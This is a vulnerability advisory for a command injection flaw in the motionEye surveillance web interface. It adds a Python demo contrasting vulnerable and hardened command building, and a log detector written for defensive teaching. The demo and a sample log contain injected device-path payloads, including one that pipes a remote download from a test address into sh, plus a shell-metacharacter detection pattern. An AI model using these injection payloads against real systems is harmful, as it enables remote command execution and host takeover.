CVE-2025-47782: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in motioneye-project motioneye

Severity: High
Type: Vulnerability
Tags: cve, cve-2025-47782, cwe-78
Published: Wed May 14 2025 (05/14/2025, 15:54:59 UTC)
Source: CVE
Vendor/Project: motioneye-project
Product: motioneye

Description

motionEye is an online interface for the software motion, a video surveillance program with motion detection. In versions 0.43.1b1 through 0.43.1b3, a crafted camera device path submitted to the `add`/`add_camera` motionEye web API allows an attacker with motionEye admin user credentials to execute any command within a non-interactive shell as the motionEye run user, `motion` by default. The vulnerability has been patched in motionEye v0.43.1b4. As a workaround, apply the patch manually.

AI-Powered Analysis

Last updated: 07/06/2025, 14:09:42 UTC

Technical Analysis

CVE-2025-47782 is a high-severity OS command injection vulnerability (CWE-78) in motionEye, a web front end for the motion video surveillance software. It affects versions 0.43.1b1 through 0.43.1b3. The camera device path submitted through the `add`/`add_camera` web API endpoints is not neutralized before it reaches an OS command, so an attacker holding motionEye admin credentials can submit a crafted device path and execute arbitrary commands in a non-interactive shell. The commands run with the privileges of the motionEye process user, `motion` by default, so the immediate impact is bounded by that account's permissions but still reaches the surveillance host's files, network and configuration. The attack is network-reachable, needs no user interaction, and requires nothing beyond valid admin credentials. The issue is fixed in motionEye 0.43.1b4; users who cannot upgrade should apply the patch manually. No in-the-wild exploitation has been reported. The CVSS 4.0 base score of 8.9 (High) reflects the low attack complexity once credentials are held and the full compromise of the `motion` user's context.
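
The following Python example is added here to illustrate the class of bug described above; it is not motionEye's code and does not reproduce the actual payload or the project's fix. It assumes a hypothetical helper that probes a V4L2 device with `v4l2-ctl`: the vulnerable form interpolates the device path into a shell command string, the hardened form allow-lists the value against `/dev/videoN` and builds an argv list so no shell parses it. The `MALICIOUS_DEVICE` value and the `v4l2-ctl` invocation are constructed for the example.

```python
import re
import shlex
import subprocess

# Constructed attacker-controlled device path for illustration only; the
# payload that affected motionEye 0.43.1b1-0.43.1b3 is not reproduced here.
MALICIOUS_DEVICE = '/dev/video0"; id > /tmp/pwned; echo "'

# Strict allow-list: a V4L2 device node and nothing else. Rejecting anything
# else also stops argument injection (a value starting with '-' that v4l2-ctl
# would read as an option), which an argv list alone does not prevent.
DEVICE_RE = re.compile(r'^/dev/video\d{1,3}$')


def vulnerable_cmdline(device: str) -> str:
    """Vulnerable pattern (hypothetical, not motionEye's code): the device path
    is interpolated into one string intended for subprocess(..., shell=True).
    Returned as a string rather than executed, so this function is inert."""
    return 'v4l2-ctl -d "%s" --list-formats' % device


def shell_view(cmdline: str) -> list:
    """Show how a POSIX shell would split `cmdline`: one argv list per
    ';'-separated command. shlex with punctuation_chars makes ';' and '>'
    their own tokens, approximating the shell's word splitting."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, current = [], []
    for tok in lexer:
        if tok == ';':
            commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def validate_device(device: str) -> str:
    """Reject anything that is not a plain /dev/videoN node."""
    if not DEVICE_RE.fullmatch(device):
        raise ValueError(f'rejected camera device path: {device!r}')
    return device


def hardened_argv(device: str) -> list:
    """Hardened pattern: allow-list the value, then build an argv list so no
    shell ever parses it. Quotes, ';' and '$()' in the value would reach
    v4l2-ctl as literal bytes, and the allow-list rejects them before that."""
    return ['v4l2-ctl', '-d', validate_device(device), '--list-formats']


def list_formats(device: str):
    """Run the hardened command; returns stdout, or None if v4l2-ctl is absent."""
    try:
        proc = subprocess.run(hardened_argv(device), capture_output=True,
                              text=True, check=False)
    except FileNotFoundError:
        return None
    return proc.stdout


if __name__ == '__main__':
    for cmd in shell_view(vulnerable_cmdline(MALICIOUS_DEVICE)):
        print('shell would run:', cmd)
    print('hardened argv:', hardened_argv('/dev/video0'))
    try:
        hardened_argv(MALICIOUS_DEVICE)
    except ValueError as exc:
        print(exc)
```

Running the script shows the attacker's input turning one intended `v4l2-ctl` invocation into three shell commands, the second of which is `id > /tmp/pwned`; the hardened path refuses the same value before any process is spawned. Note that the allow-list does the real work: switching to an argv list stops shell metacharacters, but without the allow-list a value such as `-d` or `/dev/video0 --set-ctrl=...` could still be misread by the target program.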

Potential Impact

For European organizations deploying motionEye for video surveillance, this vulnerability poses a significant risk. Successful exploitation could allow attackers to execute arbitrary commands on surveillance servers, potentially leading to full system compromise, data exfiltration, or disruption of surveillance operations. This affects confidentiality by exposing video feeds or system data, integrity by allowing tampering with surveillance configurations or logs, and availability by disabling or degrading surveillance services. Organizations in critical infrastructure sectors such as transportation, public safety, and utilities that use motionEye for monitoring could face operational disruption or espionage risks. The requirement for admin credentials limits the attack surface, but insider threats, phished or reused passwords, and admin sessions reachable from untrusted networks all make those credentials obtainable. Where motionEye is used by small and medium enterprises or public sector entities, the threat is material and warrants prompt remediation.

Mitigation Recommendations

European organizations should prioritize upgrading motionEye to version 0.43.1b4 or later, which fully remediates the vulnerability. Where an immediate upgrade is not feasible, apply the upstream patch manually. Because exploitation requires admin credentials, protect them: use unique, strong admin passwords, change them promptly if compromise is suspected, and add multi-factor authentication where the deployment allows it, for example at an authenticating reverse proxy in front of the web UI. Restrict access to the motionEye web interface and API to trusted management networks through network segmentation. Log administrative API calls, in particular add-camera requests, and alert when the submitted device path is anything other than a plain `/dev/videoN` node. Host-based intrusion detection on surveillance servers can alert on the `motion` user spawning unexpected processes such as shells, `curl` or `wget`. Include motionEye deployments in regular vulnerability scanning and penetration testing. Finally, harden the operating system and the `motion` account itself: run the service under a dedicated unprivileged user with no sudo rights, and confine it with systemd sandboxing options or a container so that a command injection cannot easily escalate beyond the surveillance process.
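
As an added example of the logging and alerting recommended above, the Python detector below runs over a constructed access log and flags add-camera requests whose device path is not a plain `/dev/videoN` node. It is not part of the advisory or of motionEye. The log format (a reverse proxy recording the body of admin API calls), the `/config/add/` endpoint path, and the JSON field names `proto` and `path` are assumptions for this example; adapt them to what your deployment actually logs.

```python
import json
import re
from urllib.parse import urlsplit

# Constructed sample log. The line format, the endpoint path and the JSON
# field names are assumptions for this example, not a motionEye format.
# 198.51.100.7 is a documentation (TEST-NET-2) address.
SAMPLE_LOG = """\
2025-05-14T16:01:02Z 10.0.8.14 POST /config/add/?_username=admin body={"proto":"v4l2","path":"/dev/video0"}
2025-05-14T16:01:45Z 10.0.8.14 POST /config/add/?_username=admin body={"proto":"v4l2","path":"/dev/video0\\"; curl http://198.51.100.7/x|sh; echo \\""}
2025-05-14T16:02:10Z 10.0.8.22 POST /config/add/?_username=admin body={"proto":"netcam","url":"rtsp://192.168.1.50/stream"}
2025-05-14T16:02:33Z 10.0.8.14 POST /config/add/?_username=admin body={"proto":"v4l2","path":"/dev/video0 --set-ctrl=brightness=0"}
2025-05-14T16:03:01Z 10.0.8.22 GET /config/list/?_username=admin body=
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<target>\S+) body=(?P<body>.*)$')
# What a legitimate V4L2 device path looks like.
SAFE_DEVICE = re.compile(r'^/dev/video\d{1,3}$')
# Characters a POSIX shell treats specially; any of these in a device path
# is an injection attempt regardless of whether the server is patched.
SHELL_META = re.compile(r'''[;&|`$<>(){}'"\\\n]''')


def classify_device(path: str):
    """Return a reason string if `path` is suspicious, else None."""
    if SHELL_META.search(path):
        return 'shell metacharacters in device path'
    if not SAFE_DEVICE.fullmatch(path):
        # No metacharacters, but still not a device node: e.g. an attempt to
        # smuggle extra arguments to the tool that consumes the path.
        return 'device path outside /dev/videoN allow-list'
    return None


def detect(log_text: str) -> list:
    """Scan add-camera requests and return one finding per suspicious path."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m['method'] != 'POST':
            continue
        if not urlsplit(m['target']).path.startswith('/config/add'):
            continue
        try:
            body = json.loads(m['body'])
        except ValueError:
            findings.append({'ts': m['ts'], 'src': m['src'], 'path': None,
                             'reason': 'unparseable JSON body'})
            continue
        path = body.get('path') if isinstance(body, dict) else None
        if not isinstance(path, str):
            continue  # network cameras carry a URL, not a device path
        reason = classify_device(path)
        if reason:
            findings.append({'ts': m['ts'], 'src': m['src'],
                             'path': path, 'reason': reason})
    return findings


if __name__ == '__main__':
    for f in detect(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} {f['reason']}: {f['path']!r}")
```

On the sample the detector reports the second request (quotes and `;` in the path) and the fourth (an argument-injection shape with no shell metacharacters), and ignores the legitimate `/dev/video0` request, the network camera and the `GET`. Alerting on the source address of the second finding also gives incident responders the admin session to revoke.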

Technical Details

Data Version: 5.1
Assigner Short Name: GitHub_M
Date Reserved: 2025-05-09T19:49:35.620Z
CISA Enriched: true
CVSS Version: 4.0
State: PUBLISHED

Threat ID: 682cd0fb1484d88663aec8e7

Added to database: 5/20/2025, 6:59:07 PM

Last enriched: 7/6/2025, 2:09:42 PM

Last updated: 7/31/2025, 8:41:42 PM
